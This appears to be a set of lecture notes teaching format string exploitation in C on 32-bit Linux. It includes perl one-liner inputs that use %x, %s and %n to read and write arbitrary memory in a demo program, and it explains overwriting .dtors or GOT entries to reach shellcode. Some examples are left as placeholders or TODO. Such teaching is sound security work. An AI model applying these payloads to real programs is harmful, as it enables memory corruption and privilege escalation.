Format String Exploits




1 - A history lesson


Buffer Overflows have been around since the mid 80's.  THE doc on stack
overflows was written in:


     P H R A C K   4 9

     November 08, 1996

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Smashing The Stack For Fun And Profit
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

by Aleph One


Since the discovery of buffer overflows there have been a few thousand in the
wild.


Format string explots have were made public in June 1999.  There have only
been a few dozen seen.  

 Application                Found by            Impact         years
  -------------------------------------------------------------------------
   wu-ftpd 2.*                security.is         remote root     > 6
   Linux rpc.statd            security.is         remote root     > 4
   IRIX telnetd               LSD                 remote root     > 8
   Qualcomm Popper 2.53       security.is         remote user     > 3
   Apache + PHP3              security.is         remote user     > 2
   NLS / locale               CORE SDI            local root       ?
   screen                     Jouko Pynnonen      local root      > 5
   BSD chpass                 TESO                local root       ?
   OpenBSD fstat              ktwo                local root       ?

(Table taken from: http://www.cs.ucsb.edu/~jzhou/security/formats-teso.html )



2 - What is a format string?
	- Question:  How do you output data in a C program? 

		answer


	- Let's take a look at an example of format strings in action.

		example1



3 - Malformed Format Strings
	- Recall from example1 the use of the %x format string.  
	  It prints in hex the data located in the memory of the 
	  appropriate argument to the printf() call.


	- Question: What happens when the number of format strings and the number
	  of arguments are not equal??

		answer

	- What does this really mean?  Well... let's see the code:
		
		example2

	- Where exactly is the data that's being read?  If you've been paying
	  attention to the other talks, you should know this...  But if I have to
	  spell it out for you...


		When printf("%d %08x.%08x.%08x.%08x.%08x.%08x.%08x.", i); is
		called, just like any other function, it's arguments are pushed onto the
		stack, followed by the return address of the function, saved frame pointer,
		and local variables to that function.

		Below is a (hopefully) familiar diagram of the stack when printf() is 
		called (note that the stack grows down in the figure):


		+---------+
		|   old   |
		+---------+
		|   data  |
  		+---------+  <- 'top' of stack before call to printf()
		|    i    |
		+---------+
		| fmt_str |
		+---------+
		|   ret   |
		+---------+
		|   sfp   |
		+---------+  <- 'top' of stack after call to printf()


		The first %d looks at the memory location that the first argument
		*should* be at, in this case 'i' is located there.  The next %08x will
		look at the next memory location on the stack, where it expects to find
		the 2nd argument... instead it finds old data left on the stack from
		before the function call.
		

	- That's great, but who cares?
	
		It is unlikely that a programmer will string together a ton of %x for no
		reason except to let you view the contents of the stack.  But there is
		something a programmer might do...



4 - The vulnerablitiy
	- The right way to print a string:
		printf("%s", buf); 


	- The wrong way to print a string:	
		printf(buf); 


	See: example3

	-  When a programmer makes the mistake of letting you control the format
	strings, all hell breaks loose... 


	We can read from the stack above us as before:

		./a.out `perl -e 'print "%08x."x40;'`

	Notice the bytes: 0x25 0x30 0x38 0x78 0x2e are repeated quite a lot.  These bytes are
	actually the ASCII characters: %08x.  Since the string passed to printf() is
	stored on the stack before the call is made (in our case into the buffer
	'text'), eventually we will be reading the memory of the format string itself.
	This is a *good* thing.


	-  What would happen if instead of using so many %08x we put something
	   useful at the start of our format string? 


		./a.out `perl -e 'print "\x7d\xfb\xff\xbf"'`%08x.%08x.%08x.%s

	
	We can now read from arbitrary memory locations!


	- But wait, there's more... remember our friend %n ?  What we did with %s
	  for reading, we can do with %n for writting.

		If you remember the line:

			** test_num @ 0x080496dc = -72 = 0xffffffb8

		We will now use it's address as a location to write to...


		./a.out `perl -e 'print "\xdc\x96\x04\x08"'`%08x.%08x.%08x.%n


		The %n will write it whatever address we pass it the number of bytes
		printed up to that point.  In this case it outputs:

			** test_num @ 0x080496dc = 31 = 0x0000001f

		What is this 31??  So, our string we passed to printf has "\xdc\x96\x04\x08"
		which is 4 bytes.  And then if you were paying attention to what is
		printed by %08x you would see that it prints 8 characters.  8 x 3 = 24,
		plus the 3 `.' characters.  24 + 3 + 4 = 31

		We can change the field width of %x to any number we want to control
		what gets written by %n.

		./a.out `perl -e 'print "\xdc\x96\x04\x08"'`%08x.%08x.%080x.%n
			
			** test_num @ 0x080496dc = 103 = 0x00000067


	- What we can do now is write to any arbitrary memory location.  But writing
	the number of %08x and other crap in our format string isn't that useful...
	or is it?

		If we want to write somthing like 0xDDCCBBAA, which is the format of a
		memory address.  We can use mulitple calls to %n, at 4 consecutive
		bytes.  Doing so we can overlap small values byte by byte, instead of
		trying to write a gigantic number of bytes to the screen or file.

		Conceptually it looks like this:


                AA 00 00 00          |  0x080496dc
                   BB 00 00 00       |  0x080496dd
                      CC 00 00 00    |  0x080496de
                         DD 00 00 00 |  0x080496df
               ----------------------|
                AA BB CC DD          |  Result starting at 0x080496dc

              After re-writing this in the correct byte order: 0xDDCCBBAA



	
	In code we need to specify each address we want to write to, and put
	four %n to write data to each location.	

	./a.out `perl -e 'print "\xdc\x96\x04\x08JUNK\xdd\x96\x04\x08"'`%x.%x.%146x.%n%017x%n

	The reason for JUNK is becase we need to specify a %x in between each %n to
	increment the value that will be written.  The above example will write
	0x0000bbaa to test_val

	I will leave the task of writing all four bytes as an exercise for the
	reader.


	- Now, what if we want to write a more legit looking address: 0x0806abcd
	 

		Well first we need to print 205 bytes (0xcd) total, for the first %n, then
		we need to print a total of 171 bytes (0xab) ... What's wrong with this?  
		It should be obvious...

		answer




5 - A better way

	- Direct Parameter Access allows us to eliminate a lot of the JUNK (pun
	  intended).

		An example of direct parameter access:
	
		printf("Argument 7: %7$d, Argument 2: %2$d \n", 10, 20, 30, 40, 50, 60, 70, 80);

		By using %7$d, we tell this particular format string to access the
		memory for the 7th argument.  We can now re-write our previous example: 
	

		./a.out `perl -e 'print "\xdc\x96\x04\x08\xdd\x96\x04\x08"'`%3\$161x.%4\$n%3\$17x%5\$n



6 - The Exploit
	- So, we can read from and write to any memory address we want.  What and
	  Where do we want to write?  Well.. if you want, you can overwrite the
	  return address of the stack frame above you just like a stack overflow.
	  But with format strings we're not limited by the same contraints as some
	  overflow.  We can choose to overwrite sections of memory that are more
	  predictible...


	- Thus enters dtors.  GCC compiled programs contain two special
	  sections called .ctors and .dtors.  These secions are made for
	  constructors and destructors.  But wait, C doesn't have constructors and
	  destructors you fool...  well, not in the object oriented sense, no.. but
	  they do let you write functions that are called just before main starts, and
	  just after it exits.

		See: example4


		Lets take a look at the symbols...


		$ nm a.out 
		080495f0 A __bss_start
		08048330 t call_gmon_start
		080483e6 t cleanup
		080495f0 b completed.4577
		080494e8 d __CTOR_END__
		080494e4 d __CTOR_LIST__
		080495e4 D __data_start
		080495e4 W data_start
		08048464 t __do_global_ctors_aux
		08048354 t __do_global_dtors_aux
		080495e8 D __dso_handle
		080494f4 d __DTOR_END__
		080494ec d __DTOR_LIST__
		080494fc D _DYNAMIC
		080495f0 A _edata
		080495f4 A _end
		         U exit@@GLIBC_2.0
		0804848c T _fini
		080494e4 A __fini_array_end
		080494e4 A __fini_array_start
		080484a8 R _fp_hw
		08048388 t frame_dummy
		080484e0 r __FRAME_END__
		080495c8 D _GLOBAL_OFFSET_TABLE_
		         w __gmon_start__
		080482a4 T _init
		080494e4 A __init_array_end
		080494e4 A __init_array_start
		080484ac R _IO_stdin_used
		080494f8 d __JCR_END__
		080494f8 d __JCR_LIST__
		         w _Jv_RegisterClasses
		0804845c T __libc_csu_fini
		08048400 T __libc_csu_init
		         U __libc_start_main@@GLIBC_2.0
		080483b0 T main
		080495ec d p.4576
		080494e4 A __preinit_array_end
		080494e4 A __preinit_array_start
		         U puts@@GLIBC_2.0
		0804830c T _start



		$ objdump -s -j .dtors ./a.out

		./a.out:     file format elf32-i386
		
		Contents of section .dtors:
		 80494ec ffffffff e6830408 00000000           ............	

	As you can see, the nm command shows you where the address of the start and
	end of dtors.  And taking the objdump output of the .dtors section, you can
	see that the address of __DTOR_LIST__  is the start of .dtors, this address
	also always contains ffffffff.  __DTOR_END__ shows the address of the end
	of the .dtors section (also always 00000000).  In between the two address
	is the addres of our cleanup function.  



	$ objdump -h ./a.out 
	
	./a.out:     file format elf32-i386
	
	Sections:
	Idx Name          Size      VMA       LMA       File off  Algn
	  0 .interp       00000013  08048114  08048114  00000114  2**0
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  1 .note.ABI-tag 00000020  08048128  08048128  00000128  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  2 .hash         00000030  08048148  08048148  00000148  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  3 .dynsym       00000070  08048178  08048178  00000178  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  4 .dynstr       00000063  080481e8  080481e8  000001e8  2**0
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  5 .gnu.version  0000000e  0804824c  0804824c  0000024c  2**1
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  6 .gnu.version_r 00000020  0804825c  0804825c  0000025c  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  7 .rel.dyn      00000008  0804827c  0804827c  0000027c  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  8 .rel.plt      00000020  08048284  08048284  00000284  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	  9 .init         00000017  080482a4  080482a4  000002a4  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, CODE
	 10 .plt          00000050  080482bc  080482bc  000002bc  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, CODE
	 11 .text         00000180  0804830c  0804830c  0000030c  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, CODE
	 12 .fini         0000001a  0804848c  0804848c  0000048c  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, CODE
	 13 .rodata       00000037  080484a8  080484a8  000004a8  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	 14 .eh_frame     00000004  080484e0  080484e0  000004e0  2**2
	                  CONTENTS, ALLOC, LOAD, READONLY, DATA
	 15 .ctors        00000008  080494e4  080494e4  000004e4  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 16 .dtors        0000000c  080494ec  080494ec  000004ec  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 17 .jcr          00000004  080494f8  080494f8  000004f8  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 18 .dynamic      000000c8  080494fc  080494fc  000004fc  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 19 .got          00000004  080495c4  080495c4  000005c4  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 20 .got.plt      0000001c  080495c8  080495c8  000005c8  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 21 .data         0000000c  080495e4  080495e4  000005e4  2**2
	                  CONTENTS, ALLOC, LOAD, DATA
	 22 .bss          00000004  080495f0  080495f0  000005f0  2**2
	                  ALLOC
	 23 .comment      0000010e  00000000  00000000  000005f0  2**0
	                  CONTENTS, READONLY

	The above objdump shows the section headers, notice that .dtors is not
	READONLY.  So, what we can do is use our format string exploit to overwrite
	the .dtor section and put a call to some shellcode.


	TODO: Working example.



	- The Global Offset Table

		

		$ objdump -d -j
		.plt c.out 
		
		c.out:     file format elf32-i386
		
		Disassembly of section .plt:
		
		08048304 :
		 8048304:       ff 35 e0 96 04 08       pushl  0x80496e0
		 804830a:       ff 25 e4 96 04 08       jmp    *0x80496e4
		 8048310:       00 00                   add    %al,(%eax)
		        ...
		
		08048314 :
		 8048314:       ff 25 e8 96 04 08       jmp    *0x80496e8
		 804831a:       68 00 00 00 00          push   $0x0
		 804831f:       e9 e0 ff ff ff          jmp    8048304 <_init+0x18>
		
		08048324 <__libc_start_main@plt>:
		 8048324:       ff 25 ec 96 04 08       jmp    *0x80496ec
		 804832a:       68 08 00 00 00          push   $0x8
		 804832f:       e9 d0 ff ff ff          jmp    8048304 <_init+0x18>
		
		08048334 :
		 8048334:       ff 25 f0 96 04 08       jmp    *0x80496f0
		 804833a:       68 10 00 00 00          push   $0x10
		 804833f:       e9 c0 ff ff ff          jmp    8048304 <_init+0x18>
		
		08048344 :
		 8048344:       ff 25 f4 96 04 08       jmp    *0x80496f4
		 804834a:       68 18 00 00 00          push   $0x18
		 804834f:       e9 b0 ff ff ff          jmp    8048304 <_init+0x18>
		
		08048354 <__gmon_start__@plt>:
		 8048354:       ff 25 f8 96 04 08       jmp    *0x80496f8
		 804835a:       68 20 00 00 00          push   $0x20
		 804835f:       e9 a0 ff ff ff          jmp    8048304 <_init+0x18>
		
		08048364 :
		 8048364:       ff 25 fc 96 04 08       jmp    *0x80496fc
		 804836a:       68 28 00 00 00          push   $0x28
		 804836f:       e9 90 ff ff ff          jmp    8048304 <_init+0x18>